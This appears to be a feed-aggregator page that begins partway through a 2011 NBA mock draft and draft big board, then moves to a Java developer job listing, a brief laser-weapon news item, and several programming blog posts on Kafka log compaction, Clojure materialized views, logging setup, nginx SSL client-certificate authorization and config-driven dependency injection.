Odds pick is dealt: 60%
If they can’t move this pick, Chicago could go with Jenkins - a combo guard who is NBA ready and can create for himself and others.

29. San Antonio - Kyle Singler (SF/PF), Duke:
Odds pick is dealt: Minimal
The Spurs aren’t giving up hope that their window has closed. As such, they take a guy who can help them immediately as long as he improves his shot selection.

30. Chicago - Bojan Bogdanovic (SG/SF), Cibona VIP Zagreb:
Odds pick is dealt: 40%
Again, another pick they will try to move... however this one will be harder. If they can’t move it, I see them taking a guy they can stash overseas and hope it pays dividends when he finally comes over. In this case, it’s one of the best scorers in Europe: Bojan Bogdanovic.


31. Miami (from MIN) - Reggie Jackson (PG/SG), Boston College
32. Cleveland - Jimmy Butler (SF), Marquette
33. Detroit (from TOR) - Darius Morris (PG/SG), Michigan
34. Washington - Malcolm Lee (SG/PG), UCLA
35. New Jersey - Nikola Mirotic (PF), Real Madrid
36. Sacramento - Josh Selby (SG/PG), Kansas
37. LA Clippers (from DET) - JaJuan Johnson (PF), Purdue
38. Houston (from LAC) - Travis Leslie (SG), Georgia
39. Charlotte - Nolan Smith (PG/SG), Duke
40. Milwaukee - Norris Cole (PG), Cleveland State
41. LA Lakers (from GSW) - Cory Joseph (PG), Texas
42. Indiana - Chandler Parsons (SF), Florida
43. Chicago (from UTA) - Jon Leuer (C), Wisconsin
44. Golden State (from PHX) - Jordan Williams (C), Maryland
45. New Orleans (from PHI) - E’Twaun Moore (SG), Purdue
46. LA Lakers (from NYK) - Scotty Hopson (SG/SF), Tennessee
47. LA Clippers (from HOU) - Trey Thompkins (PF), Georgia
48. Atlanta - Shelvin Mack (SG/PG), Butler
49. Memphis - Keith Benson (PF/C), Oakland
50. Philadelphia (from NOH) - Greg Smith (PF/C), Fresno State
51. Portland - Demetri McCamey (PG), Illinois
52. Detroit (from DEN) - Jereme Richmond (SF), Illinois
53. Orlando - David Lighty (SG/SF), Ohio State
54. Cleveland (from OKC) - Xavi Rabaseda (SG), Baloncesto Fuenlabrada
55. Boston - Ben Hansbrough (PG/SG), Notre Dame
56. LA Lakers - Isaiah Thomas (PG/SG), Washington
57. Dallas - Josh Harrellson (C), Kentucky
58. LA Lakers (from MIA) - Robin Benzig (SF/PF), Ratiopharm Ulm
59. San Antonio - Giorgi Shermadini (C), Union Olimpija Ljubljana
60. Sacramento (from CHI) - Andrew Goudelock (PG), Charleston
          Casper's Final 2011 NBA Draft Big Board   
Final rankings of players, with tiers and likely ranges (players whose draft ceiling is considered to be the 2nd round are labeled 31-Undrafted) - players tabbed as 1st rounders list the teams which appear to have the most interest in them.

Tier 1:
1. Kyrie Irving - Fr. PG, Duke
Range: 1-2 --- Most likely: Cavaliers

Tier 2:
2. Derrick Williams - So. PF/SF, Arizona
Range: 1-2 --- Most likely: Timberwolves

Tier 3:
3. Jonas Valanciunas - 1992 C, Lietuvos Rytas
Range: 4-11 --- Most likely: Cavaliers, Pistons

4. Enes Kanter - 1992 PF/C, Kentucky
Range: 3-8 --- Most likely: Cavaliers, Wizards

5. Kemba Walker - Jr. PG, Connecticut
Range: 3-8 --- Most likely: Raptors, Kings

6. Jan Vesely - 1990 SF/PF, KK Partizan Belgrade
Range: 3-9 --- Most likely: Jazz, Wizards

7. Alec Burks - So. SG, Colorado
Range: 9-17 --- Most likely: Bucks, Knicks

Tier 4:
8. Brandon Knight - Fr. PG/SG, Kentucky
Range: 3-7 --- Most likely: Jazz, Raptors

9. Donatas Motiejunas - 1990 PF/C, Benetton Treviso
Range: 10-22 --- Most likely: Rockets, Sixers

10. Bismack Biyombo - 1992 PF/C, Baloncesto Fuenlabrada
Range: 5-17 --- Most likely: Pistons, Warriors, Rockets

11. Tristan Thompson - Fr. PF, Texas
Range: 6-16 --- Most likely: Pistons, Bobcats, Suns

Tier 5:
12. Chris Singleton - Jr. SF/PF, Florida State
Range: 7-16 --- Most likely: Bobcats, Warriors, Jazz

13. Marcus Morris - Jr. PF/SF, Kansas
Range: 8-15 --- Most likely: Bobcats, Bucks, Suns

14. Kawhi Leonard - So. SF, San Diego State
Range: 5-12 --- Most likely: Wizards, Kings

15. Tobias Harris, Fr. SF/PF, Tennessee
Range: 9-27 --- Most likely: Suns, Bobcats

16. Markieff Morris - Jr. PF, Kansas
Range: 9-22 --- Most likely: Suns, Sixers, Bobcats

17. Marshon Brooks - Sr. SG, Providence
Range: 10-20 --- Most likely: Bucks, Jazz, Knicks

18. Reggie Jackson - Jr. SG/PG, Boston College
Range: 18-31 --- Most likely: Celtics, Heat

19. Jimmer Fredette - Sr. PG/SG, Brigham Young
Range: 7-17 --- Most likely: Kings, Suns, Pacers

20. Kenneth Faried - Sr. PF/C, Morehead State
Range: 13-25 --- Most likely: Pacers, Wizards, Nuggets

Tier 6:
21. Justin Harper - Sr. PF/SF, Richmond
Range: 19-35 --- Most likely: Mavericks, Spurs, Kings

22. E’Twaun Moore - Sr. SG, Purdue
Range: 24-Undrafted

23. Nikola Mirotic - 1990 PF, Real Madrid
Range: 21-38

24. JaJuan Johnson - Sr. PF, Purdue
Range: 20-45

25. Jordan Hamilton - So. SF/SG, Texas
Range: 9-23 --- Most likely: Suns, Sixers, Bobcats

26. Tyler Honeycutt - So. SF/SG, UCLA
Range: 23-40 --- Most likely: Rockets, Celtics

27. Darius Morris - So. PG/SG, Michigan
Range: 21-41

28. Nikola Vucevic - Jr. C, USC
Range: 14-25 --- Most likely: Rockets, Sixers, Blazers

29. Jimmy Butler - Sr. SF, Marquette
Range: 23-37

30. Klay Thompson - Jr. SG/SF, Washington State
Range: 9-23 --- Most likely: Bucks, Suns, Rockets

Tier 7:
31. Josh Selby - Fr. SG/PG, Kansas
Range: 27-46

32. Jeremy Tyler - 1991 C/PF, Tokyo Apache
Range: 17-39 --- Most likely: Portland, Boston

33. Travis Leslie - Jr. SG, Georgia
Range: 25-46

34. Davis Bertans - 1992 SF, Union Olimpija Ljubljana
Range: 23-35

35. Bojan Bogdanovic - 1989 SG/SF, Cibona VIP Zagreb
Range: 31-Undrafted

36. Charles Jenkins - Sr. PG/SG, Hofstra
Range: 21-41

37. Kyle Singler - Sr. SF/PF, Duke
Range: 24-46

38. Isaiah Thomas, Jr. PG/SG, Washington
Range: 28-Undrafted

39. Demetri McCamey - Sr. PG, Illinois
Range: 31-Undrafted

40. Cory Joseph - Fr. PG, Texas
Range: 21-Undrafted

41. Norris Cole - Sr. PG, Cleveland State
Range: 21-51

42. Nolan Smith - Sr. PG/SG, Duke
Range: 31-51

43. Jon Leuer - Sr. PF/C, Wisconsin
Range: 25-57

44. Iman Shumpert - Jr. SG, Georgia Tech
Range: 13-34 --- Most likely: Suns, Knicks, Nuggets

45. DeAndre Liggins - Jr. SG/SF, Kentucky
Range: 31-Undrafted
          Senior Java Developer / Methods Business and Digital Technology Limited / Exeter, Devon, United Kingdom   
Methods Business and Digital Technology Limited/Exeter, Devon, United Kingdom

Senior Java Developer

£45,000- £55,000

Permanent

Exeter

An exciting and buzzing company are seeking a Software Engineer to join them; you'll be a key member of the engineering team of this fast-growing company.

This is an excellent role for career development, as, being a small team, you will have the opportunity to be involved in every component of this ever growing business, developing all areas of your skill set.

Their SaaS platform is built with numerous tools, from MySQL to ElasticSearch and Java, so from the Back End systems, Front End technologies and mobile applications to the APIs and the tools and technologies that keep it all humming, you'll get to be involved in it all.

You'll work closely with your engineering colleagues as well as the product team to develop new functionality, generate new business ideas and build a better, scalable platform for the future.

About you

You are a software engineering pro. You design beautiful technology which solves real business problems. You are happiest working on the technology that powers the business, from Back End code through to infrastructure and data storage and processing. You understand the complexities of the stack, strive to improve things with consistently high-quality code and great testing, and get a kick out of doing things correctly.

You're a first-rate and intelligent problem solver, ensuring you solve said problems in order of business value. You have proven experience of designing applications with production-strength, high-traffic architectures and possess an understanding of complicated SaaS platforms with high availability.

In an ideal world, you'll have some experience in (AWS) or an alternative cloud platform. You're comfortable on the command line and adept at using the tools which are part and parcel of a modern fast paced software development environment, so naturally Git and Jenkins are essential tools for you.

This role is perfect for you if:

You are seeking a role in which you can get involved in major product and technology decisions from the outset, and help grow an exciting business.

What's on offer:

An excellent, friendly and hardworking team - the kind of team that is sociable and collaborative

Opportunities to grow and develop your career

A challenging and fast paced environment (the good kind of challenging) with good growth

Salary of £45-55k

Qualifications & skills

It is essential that you have an advanced knowledge of the following:

In-depth understanding of the entire development process (design, development and deployment)

4+ years of experience as a full-stack developer in commercial web and mobile development environments

Full-stack Java development experience, encompassing broad exposure to HTML, CSS, Javascript and other Front End frameworks

Strong with browser testing and debugging

SQL, RESTful web services, Spring, Hibernate experience

Eclipse/Maven/Tomcat/Git experience

JUnit, Selenium or similar

Experience in Agile development (ideally SCRUM)

Desired Technical Skills & Awareness:

Distributed architecture skills and capabilities, ideally cloud environments

Exposure to NoSQL or document persistence layer technologies

Experience of working with Lucene, ElasticSearch, SOLR, Hadoop or other indexing/caching solutions

Angular/Ember or alternative frameworks

Apache Wicket

Strong understanding of layout aesthetics

Knowledge of SEO principles

Don't hesitate to apply or send your CV directly to Laura Dinnage today, and we can have an informal/confidential discussion from there.

Employment Type: Permanent

Pay: 45,000 to 55,000 GBP (British Pound)
Pay Period: Annual

Apply To Job
          US Army fires laser 'cannon' from helicopter   
High-energy laser weapon developed with Raytheon tested on board an Apache AH-64. - Source: optics.org
          Hands on Kafka: Dynamic DNS   

I recently wrote about kafka log compaction and the use cases it allows. The article focused on simple key-value storage and did not address going beyond this. In practice, keys often need to be associated with more than just bare values.

To see how log compaction can still be leveraged with more complex types, we will see how to approach maintaining the state of a list in kafka through the lens of a dynamic DNS setup.

DNS: the 30 second introduction

I assume my readers are familiar with the architecture of the Domain Name System (DNS). To summarize, DNS revolves around the notion of zones, separated by dots, which follow a tree-like hierarchy starting at the right-most zone.

Hierarchy

Each zone is responsible for maintaining a list of records. Records each have a type and an associated payload. Here’s a non-exhaustive list of record types:

Record   Content
------   -------
SOA      Start of Authority. Provides zone details and timeouts.
NS       Delegates zone to other nameservers.
A        Maps a record to an IPv4 address.
AAAA     Maps a record to an IPv6 address.
CNAME    Aliases a record to another.
MX       Mail server responsibility for a record.
SRV      Arbitrary service responsibility for a record.
TXT      Arbitrary text associated with record.
PTR      Maps an IP record with a zone.

Given this hierarchy and properties, DNS can be abstracted to a hash table, keyed by zone. Value contents can be considered lists.

{
  "exoscale.com": [
    {record: "api", type: "A", content: "10.0.0.1"},
    {record: "www", type: "A", content: "10.0.0.2"},
  ],
  "google.com": [
    {record: "www", type: "A", content: "10.1.0.1"}
  ]
}

In reality, zone contents are stored in zone files, whose contents look roughly like this:

$TTL  86400 
$ORIGIN example.com.
@  1D  IN  SOA ns1.example.com. hostmaster.example.com. (
               2015042301 ; serial
               3H ; refresh
               15 ; retry
               1w ; expire
               3h ; minimum
               )
IN  NS  ns1.example.com.     ; nameserver
IN  NS  ns2.example.com.     ; nameserver
IN  MX  10 mail.example.com. ; mail provider
; server host definitions
ns1    IN  A      10.0.0.1
ns2    IN  A      10.0.0.2
mail   IN  A      10.0.0.10
www    IN  A      10.0.0.10
api    IN  CNAME  www

Based on our mock list content above, generating a correct DNS zone file is a simple process.
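
As a rough illustration, rendering the hash-table representation into zone-file record lines could be sketched in clojure like this (the helper names are mine, not part of any library):

(defn record->line
  [{:keys [record type content]}]
  (format "%s IN %s %s" record type content))

(defn zone->lines
  [zone records]
  (cons (str "$ORIGIN " zone ".")
        (map record->line records)))

;; (zone->lines "exoscale.com" [{:record "api" :type "A" :content "10.0.0.1"}])
;; => ("$ORIGIN exoscale.com." "api IN A 10.0.0.1")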

Dynamic DNS motivation

Dynamic DNS updates greatly help when doing any of the following:

  • Automated zone synchronisation based on configuration management.
  • Automated zone synchronisation based on IaaS content.
  • Authorized and authenticated programmatic access to zone contents.

Most name servers support fast reloads and convergence of configuration, but still require generating zone files on the fly and reloading configuration. Kafka can be a very valid choice to maintain a stream of changes to zones.

Storing zone changes in Kafka

Updates to DNS zones usually trickle in as individual record changes. An evident candidate for topic keys is the actual zone name. As far as changes are concerned, it makes sense to store the individual record changes, not the whole zone on each change. Kafka payloads could thus be standard operations on lists:

Operation   Effect
---------   ------
ADD         Create a record
SET         Update a record
DEL         Delete a record
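
For instance, two consecutive updates to the exoscale.com zone could be produced as follows, in the JSON style used above:

/* key: "exoscale.com" */
{op: "ADD", record: "api", type: "A", content: "10.0.0.1"}

/* key: "exoscale.com" */
{op: "DEL", record: "api", type: "A", content: "10.0.0.1"}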

Each operation modifies the state of the list, and reading from the head of the log for a particular key ensures that a correct, up-to-date version of a zone can be recreated:

Topic

Taking advantage of log compaction

While this is fully functional, the only correct compaction method for the above approach is time-based, and it requires reading from the head of the log. A simple way to address this issue is to create a second topic, meant to hold full zone snapshots, associated with the offset at which the snapshot was done. This allows log compaction to be used on the snapshot topic.

With this approach, starting a consumer from scratch only requires two operations (sketched in code below):

  • Read the snapshot log from its head.
  • Read the update log, only considering entries which are more recent than the associated snapshot time.
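
Here is a Kafka-free sketch of that bootstrap logic in clojure. The record shapes are assumptions made for illustration, not a client API: a snapshot carries the offset it was taken at plus the full record list, and each update carries its offset and an operation payload.

(defn apply-op
  "Apply a single :add/:set/:del operation to a zone's record list."
  [records {:keys [op record type content]}]
  (case op
    :add (conj records {:record record :type type :content content})
    :set (mapv #(if (and (= (:record %) record) (= (:type %) type))
                  (assoc % :content content)
                  %)
               records)
    :del (vec (remove #(and (= (:record %) record) (= (:type %) type))
                      records))))

(defn rebuild-zone
  "Start from the latest snapshot, then replay only newer updates."
  [{:keys [offset records]} updates]
  (->> updates
       (filter #(> (:offset %) offset))
       (map :payload)
       (reduce apply-op records)))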

Dual Topic

For this approach to work, a single property must remain true: snapshots emitted on the snapshot topic should be more frequent than the expiration on the update topic.

Similar use-cases

Beyond DNS, this approach is valid for all standard compound types and their operations:

  • Stacks: push, pop
  • Lists: add, del, set
  • Maps: set, unset
  • Sets: add, del

          Simple materialized views in Kafka and Clojure   

A hands-on dive into Apache Kafka to build a scalable and fault-tolerant persistence layer.

With its most recent release, Apache Kafka introduced a couple of interesting changes, not least of which is Log Compaction. In this article we will walk through a simplistic use case which takes advantage of it.

Log compaction: the five minute introduction.

I won’t extensively detail what log compaction is, since it’s been thoroughly described elsewhere. I encourage readers not familiar with the concept or Apache Kafka in general to seek out the introductory articles which give a great overview of the system and its capabilities.

In this article we will explore how to build a simple materialized view from the contents of a compacted kafka log. A working version of the approach described here can be found at https://github.com/pyr/kmodel and may be used as a companion while reading the article.

If you’re interested in materialized views, I warmly recommend looking into Apache Samza and this Introductory blog-post by Martin Kleppmann.

Overall architecture

For the purpose of this experiment, we will consider a very simple job board application. The application relies on a single entity type: a job description, and either does per-key access or retrieves the whole set of keys.

Our application will perform every read from the materialized view in redis, while all mutation operations will be logged to kafka.

log compaction architecture

In this scenario all components may be horizontally scaled. Additionally, the materialized view can be fully recreated at any time, since log compaction ensures that at least the last state of all live keys is present in the log. This means that by starting a read from the head of the log, a consistent state can be recreated.

Exposed API

A mere four REST routes are necessary to implement this service:

  • GET /api/job: retrieve all jobs and their description.
  • POST /api/job: insert a new job description.
  • PUT /api/job/:id: modify an existing job description.
  • DELETE /api/job/:id: remove a job description.

We can map this REST functionality to a clojure protocol - the rough equivalent of an interface in OOP languages - with a mere 4 signatures:

(defprotocol JobDB
  "Our persistence protocol."
  (add! [this payload] [this id payload] "Upsert entry, optionally creating a key")
  (del! [this id] "Remove entry.")
  (all [this] "Retrieve all entries."))

Assuming this protocol is implemented, writing the HTTP API is relatively straightforward when leveraging tools such as compojure in clojure:

(defn api-routes
  "Secure, Type-safe, User-input-validating, Versioned and Multi-format API.
   (just kidding)"
  [db]
  (->
   (routes
    (GET    "/api/job"     []           (response (all db)))
    (POST   "/api/job"     req          (response (add! db (:body req))))
    (PUT    "/api/job/:id" [id :as req] (response (add! db id (:body req))))
    (DELETE "/api/job/:id" [id]         (response (del! db id)))
    (GET    "/"            []           (redirect "/index.html"))

    (resources                          "/")
    (not-found                          "<html><h2>404</h2></html>"))

   (json/wrap-json-body {:keywords? true})
   (json/wrap-json-response)))

I will not describe the client-side javascript code used to interact with the API in this article; it is a very basic AngularJS application.

Persistence layer

Were we to use redis exclusively, the operation would be quite straightforward: we would rely on a redis set to contain the set of all known keys. Each corresponding key would contain a serialized job description.

In terms of operations, this would mean:

  • Retrieval would involve an SMEMBERS of the jobs key, then mapping over the result to issue a GET for each member.
  • Insertions and updates could be merged into a single “Upsert” operation which would SET a key and would then add the key to the known set through an SADD command.
  • Deletions would remove the key from the known set through a SREM command and would then DEL the corresponding key.
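
In redis-cli terms - with an assumed key name of job-42 - an upsert followed by a delete would look like this:

redis 127.0.0.1:6379> SET job-42 "{:title \"senior clojure developer\"}"
OK
redis 127.0.0.1:6379> SADD jobs job-42
(integer) 1
redis 127.0.0.1:6379> SREM jobs job-42
(integer) 1
redis 127.0.0.1:6379> DEL job-42
(integer) 1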

Let’s look at an example sequence of events

log compaction events

As it turns out, it is not much more work when going through Apache Kafka.

  1. Persistence interaction in the API

    In the client, retrieval happens as described above. This example code is in the context of the implementation - or, as clojure would have it, reification - of the above protocol.

    (all [this]
      ;; step 1. Fetch all keys from set
      (let [members (redis/smembers "jobs")] 
         ;; step 4. Merge into a map
         (reduce merge {}      
           ;; step 2. Iterate on all keys
           (for [key members]  
             ;; step 3. Create a tuple [key, (deserialized payload)]
             [key (-> key redis/get edn/read-string)]))))
    

    The rest of the operations emit records on kafka:

    (add! [this id payload]
      (.send producer (record "job" id payload)))
    (add! [this payload]
      (add! this (random-id!) payload))
    (del! [this id]
      (.send producer (record "job" id nil))))))
    

    Note how deletions just produce a record for the given key with a nil payload. This approach produces what is called a tombstone in distributed storage systems. It will tell kafka that prior entries can be discarded but will keep it for a configurable amount of time to ensure coordination across consumers.
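
    The record helper used above is not shown here; one possible shape for it - an assumption, not the companion repository's code - wraps kafka's ProducerRecord, serializing payloads as EDN and passing nil through for tombstones:

    (import '[org.apache.kafka.clients.producer ProducerRecord])

    (defn record
      [topic id payload]
      ;; a nil payload becomes a tombstone for the key
      (ProducerRecord. topic (str id) (when payload (pr-str payload))))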

  2. Consuming persistence events

    On the consumer side, the approach is as described above

    (defmulti  materialize! :op)
    
    (defmethod materialize! :del
      [payload]
      (r/srem "jobs" (:key payload))
      (r/del (:key payload)))
    
    (defmethod materialize! :set
      [payload]
      (r/set (:key payload) (pr-str (:msg payload)))
      (r/sadd "jobs" (:key payload)))
    
    (doseq [payload (messages-in-stream {:topic "jobs"})]
      (let [op (if (nil? (:msg payload)) :del :set)]
        (materialize! (assoc payload :op op))))
    

Scaling strategy and view updates

Where things start to get interesting, is that with this approach, the following becomes possible:

  • The API component is fully stateless and can be scaled horizontally. This is not much of a breakthrough and is usually the case.
  • The redis layer can use a consistent hash to shard across several instances and better use memory. While this is feasible in a more typical scenario, re-sharding induces a lot of complex manual handling. With the log approach, re-sharding only involves re-reading the log.
  • The consumer layer may be horizontally scaled as well

Additionally, since a consistent history of events is available in the log, adding views which generate new entities or new ways to look up data now only involves adapting the consumer and re-reading from the head of the log.

Going beyond

I hope this gives a good overview of the compaction mechanism. I used redis in this example but, of course, materialized views may be created on any storage backend. In some cases even this is unneeded! Since consumers register themselves in zookeeper, they could expose a query interface and let clients contact them directly.


          Easy clojure logging set-up with logconfig   

*TL;DR*: I love clojure.tools.logging, but setting JVM logging up can be a bit frustrating, I wrote logconfig to help.

When I started clojure development (about 5 years ago now), I was new to the JVM - having no real Java background. My first clojure projects were long-running, data-consuming tasks and thus logging was a consideration from the start. The least I could say is that navigating the available logging options and understanding how to configure each framework was daunting.

JVM logging 101

Once you get around to understanding how logging works on the JVM, it makes a lot of sense. For those not familiar with the concepts, here is a quick recap - I will be explaining this in the context of log4j, but the same holds for slf4j, logback and other frameworks:

  • Logging frameworks can be configured inside or outside the application.
  • The common method is for logging to be configured outside, with a specific configuration file.
  • User-provided classes can be added to the JVM to format (through layout) or write (through appenders) logs in a different manner.

This proves really useful: you might need to ship logs as JSON-formatted payloads to integrate with your logstash infrastructure, for instance, or even rely on sending logs over the network, without the original application author having had to worry about these use-cases.

The meat of the problem

While configuring logging in such a way is possible, it's not a use case many people have, and spreading an application's configuration throughout several files does not make starting out any easier.

I think elasticsearch is a project which gets things right, allowing logging to be configured from the same file as the rest of the service, only exposing the most common options.

Introducing logconfig

logconfig, which is available on clojars (at version 0.7.1 at the time of writing), provides you with a simple way of taking care of that problem. It does the following things:

  • Provide a way to configure log4j from a clojure map.
  • Allow overriding of the configuration for people wanting to provide their own log4j.properties config.
  • Support both enhanced patterns and JSON event as layouts, enabling easy integration with logstash.
  • Append to files with a time-based rolling policy.
  • Optional console output (for people using runit or debug purposes).

A nice side-effect of relying on logconfig is the reduced coordinates matrix:

;; before
  :dependencies [...
                 [commons-logging/commons-logging "1.2"]
                 [org.slf4j/slf4j-log4j12 "1.7.7"]
                 [net.logstash.log4j/jsonevent-layout "1.7"]
                 [log4j/apache-log4j-extras "1.2.17"]
                 [log4j/log4j "1.2.17"
                   :exclusions [javax.mail/mail
                                javax.jms/jms
                                com.sun.jdmk/jmxtools
                                com.sun.jmx/jmxri]]]
;; after
  :dependencies [...
                 [org.spootnik/logconfig "0.7.1"]]

Sample use-case: fleet

fleet, our command and control framework at exoscale, is configured through a YAML file which contains several sections: transport, codec, scenarios, http, security and logging.

logging:
  console: true
  files:
    - "/var/log/fleet.log"
security:
  ca-priv: "doc/ca/ca.key"
  certdir: "doc/ca"
  suffix: "pem"
scenarios:
  path: "doc/scenarios"
http:
  port: 8080
  origins:
    - "http://example.com"

The logging key in the YAML file is expected to adhere to logconfig’s format and will be fed to logconfig. Users relying on existing log4j.properties configuration can also set external to true in the YAML config and provide their log4j configuration through the standard JVM properties.
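
Wiring this up might look roughly like the following sketch, assuming logconfig exposes a start-logging! entry point under org.spootnik.logconfig - refer to the API documentation linked below for the authoritative names:

(ns fleet.main
  (:require [clj-yaml.core :as yaml]
            [org.spootnik.logconfig :refer [start-logging!]]))

(defn -main
  [& [config-path]]
  (let [config (-> (or config-path "/etc/fleet.yaml") slurp yaml/parse-string)]
    ;; hand the :logging section over before anything starts logging
    (start-logging! (:logging config))
    ;; ... start transports, http, and the rest of the service
    ))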

Both cyanite and pithos now also rely on this mechanism.

I hope this can be useful to other developers building services, apps and daemons in clojure. The full documentation for the API is available at http://pyr.github.io/logconfig; check out the project at https://github.com/pyr/logconfig.


          Beyond SSL client cert authentication: authorization   

In a previous article, I tried to make the case for using a private certificate authority to authenticate access to internal tools with SSL client certificates.

This approach is perfect to secure access to the likes of kibana, riemann-dash, graphite or similar tools.

If you start depending more and more on client-side certificates, you’re bound to reach the point when you need to tackle authorization as well.

While not as well-known, it is perfectly feasible to do so while keeping your private CA as a single source of internal user management.

I will be assuming a private CA authenticates clients accessing app.priv.example.com and that three SSL client certificates exist: alice.users.example.com, bob.users.example.com, charlie.users.example.com (as mentioned above, see here for a quick way to get up and running).

Now, since our certificates bear the names of clients, what we need to do is retrieve the certificate's name. Assuming you have a web application exposed over HTTP that nginx proxies to, here are the relevant bits that need to be added.

proxy_set_header X-Client-Verify $ssl_client_verify;
proxy_set_header X-Client-DN $ssl_client_s_dn;
proxy_set_header X-SSL-Issuer $ssl_client_i_dn;

Let’s go over them one by one:

  • $ssl_client_verify: Can be set to SUCCESS, FAILED or NONE.
  • $ssl_client_s_dn: Will be set to the Subject DN of the client cert.
  • $ssl_client_i_dn: Will be set to the Issuer DN of the client cert.

As far as configuration is concerned, this is all that is needed. There are more variables that you can tap into if necessary; refer to the nginx http_ssl module documentation for an exhaustive list. If you rely on the apache webserver, similar environment variables are available, as documented here.
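
For context, here is a minimal sketch of the surrounding server block; certificate paths and the upstream address are placeholders:

server {
    listen 443 ssl;
    server_name app.priv.example.com;

    ssl_certificate        /etc/nginx/ssl/app.priv.example.com.pem;
    ssl_certificate_key    /etc/nginx/ssl/app.priv.example.com.key;

    # clients must present a certificate signed by our private CA
    ssl_client_certificate /etc/nginx/ssl/private-ca.pem;
    ssl_verify_client      on;

    location / {
        proxy_pass http://127.0.0.1:8080;
        proxy_set_header X-Client-Verify $ssl_client_verify;
        proxy_set_header X-Client-DN     $ssl_client_s_dn;
        proxy_set_header X-SSL-Issuer    $ssl_client_i_dn;
    }
}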

Within applications, you'll receive the identity of clients in this format, which can then be retrieved with a regexp:

CN=bob.users.example.com

It’s now dead simple to tie in to your application. Here is a simple ring middleware which attaches the calling user to incoming requests.

(defn wrap-ssl-client-auth [handler]
  (fn [request]
    (let [;; ring normalizes incoming header names to lowercase
          ssl_cn   (get-in request [:headers "x-client-dn"])
          [_ user] (re-find #"CN=(.*)\.users\.example\.com$" ssl_cn)]
      (handler (assoc request :user user)))))

          Poor man's dependency injection in Clojure   

When writing daemons in clojure which need configuration, you often find yourself in a situation where you want to provide users with a way of overriding or extending some parts of the application.

All popular daemons provide this flexibility, usually through modules or plugins. The extension mechanism is a varying beast though; let's look at how popular daemons work with it.

  • nginx, written in C, uses a function pointer structure that needs to be included at compile time. Modules are expected to bring in their own parser extensions for the configuration file.

  • collectd, written in C, uses function pointer structures as well but allows dynamic loading through ld.so. Additionally, the exposed functions are expected to work with a pre-parsed structure to configure their behavior.

  • puppet, written in Ruby, lets additional modules reopen the puppet module to add functionality.

  • cassandra, written in Java, parses a YAML configuration file which specifies classes that will be loaded to provide specific functionality.

While all these approaches are valid, Cassandra's approach most closely resembles what you'd expect a clojure program to provide, since it runs on the JVM. That particular type of behavior management - usually defined in XML files, since it is so pervasive in the Java community - is called Dependency Injection.

Dependency injection on the JVM

The JVM brings two things which simplify creating a daemon with configurable behavior:

  • Interfaces let you define a contract an object must satisfy
  • Classpaths let you add code to a project at run-time (not build-time)

Cassandra’s YAML configuration takes advantage of these two properties to let you swap implementation for different types of authenticators, snitches or partitioners.

A lightweight approach in clojure

So let’s mimick cassandra and write a simple configuration file which allows modifying behavior.

Let’s pretend we have a daemon which listens for data through transports, and needs to store it using a storage mechanism. A good example would be a log storage daemon, listening for incoming log lines, and storing them somewhere.

For such a daemon, the following “contracts” emerge:

  • transports: which listen for incoming log lines
  • codecs: which determine how data should be de-serialized
  • stores: which provide a way of storing data

This gives us the following clojure protocols:

(defprotocol Store
  (store! [this payload]))

(defprotocol Transport
  (listen! [this sink]))

(defprotocol Codec
  (decode [this payload]))

(defprotocol Service
  (start! [this]))

This gives you the ability to build an engine which has no knowledge of underlying implementation and can be very easily tested and inspected:

(defn reactor
  [transports codec store]
  ;; chan, go-loop and <! come from clojure.core.async
  (let [ch (chan 10)]
    (reify
      Service
      (start! [this]
        (go-loop []
          (when-let [msg (<! ch)]
            (store! store (decode codec msg))
            (recur)))
        (doseq [transport transports]
          (start! transport)
          ;; hand each transport the channel to sink messages into
          (listen! transport ch))))))

As shown above, we use reify to create an instance of an object honoring a specific protocol (or Java interface).

Here are simplistic implementations of an EDN codec, an stdout store and an stdin transport:

(defn edn-codec [config]
  (reify Codec
    (decode [this payload]
      (read-string payload))))

(defn stdout-store [config]
  (reify
    Store
    (store! [this payload]
      (println "storing: " payload))))

(defn stdin-transport [config]
  (let [sink (atom nil)]
    (reify
      Transport
      (listen! [this new-sink]
        (reset! sink new-sink))
      Service
      (start! [this]
        (future
          (loop []
            (when-let [input (read-line)]
              (>!! @sink input)
              (recur))))))))

Note that each implementation gets passed a configuration variable - which will be useful.

A yaml configuration

Now that we have our protocols in place let’s see if we can come up with a sensible configuration file for our mock daemon:

codec:
  use: mock-daemon.codec/edn-codec
transports:
  stdin:
    use: mock-daemon.transport.stdin/stdin-transport
store:
  use: mock-daemon.store/stdout-store

Our config contains three keys. codec and store are maps containing at least a use key which points to a symbol that will yield an instance of a class implementing the Codec or Store protocol.

Now all that remains to be done is having an easy way to load this configuration and produce a codec, transports and stores from it.

Clojure introspection

Parsing the above configuration from yaml, with for instance clj-yaml.core/parse-string, will yield a map; if we only look at the codec part we would have:

{:codec {:use "mock-daemon.codec/edn-codec"}}

Our goal will be to retrieve an instance reifying Codec from the string mock-daemon.codec/edn-codec.

This can be done in two steps:

  • Retrieve the symbol
  • Call out the function

To retrieve the symbol, this simple bit will do:

(defn find-ns-var
  [candidate]
  (try
    (let [var-in-ns  (symbol candidate)
          ns         (symbol (namespace var-in-ns))]
      (require ns)
      (find-var var-in-ns))
    (catch Exception _)))

We first extract the namespace out of the namespace qualified var and require it, then get the var. Any errors will result in nil being returned.

Now that we have the function, it’s straightforward to call it with the config:

(defn instantiate
  [candidate config]
  (if-let [reifier (find-ns-var candidate)]
    (reifier config)
    (throw (ex-info (str "no such var: " candidate) {}))))

We can now tie these two functions together:

(defn get-instance
  [config]
  (let [candidate (-> config :use name symbol)
        raw-config (dissoc config :use)]
    (instantiate candidate raw-config)))
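
Given the codec configuration shown earlier, calling get-instance at the REPL would look like this:

(get-instance {:use "mock-daemon.codec/edn-codec"})
;; => an object reifying Codec, obtained by requiring mock-daemon.codec
;;    and calling edn-codec with the remaining configuration map: {}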

These three snippets are the only bits of introspection you’ll need and are the core of our solution.

Tying it together

We can now make use of get-instance in our configuration loading code:

(defn load-path
  [path]
  (-> (or path
          (System/getenv "CONFIGURATION_PATH")
          "/etc/default_path.yaml")
      slurp
      parse-string))

(defn get-transports
  [transports]
  (zipmap (keys transports)
          (mapv get-instance (vals transports))))

(defn init
  [path]
  (-> (load-path path)
      (update-in [:codec] get-instance)
      (update-in [:store] get-instance)
      (update-in [:transports] get-transports)))

Using it from your main function

Now that all elements are there, starting up the daemon ends up only creating the configuration and working with protocols by calling our previous reactor function.

(defn main
  [& [config-file]]
  (let [config     (config/init config-file)
        codec      (:codec config)
        store      (:store config)
        transports (:transports config)
        reactor    (reactor transports codec store)]
    (start! reactor)))

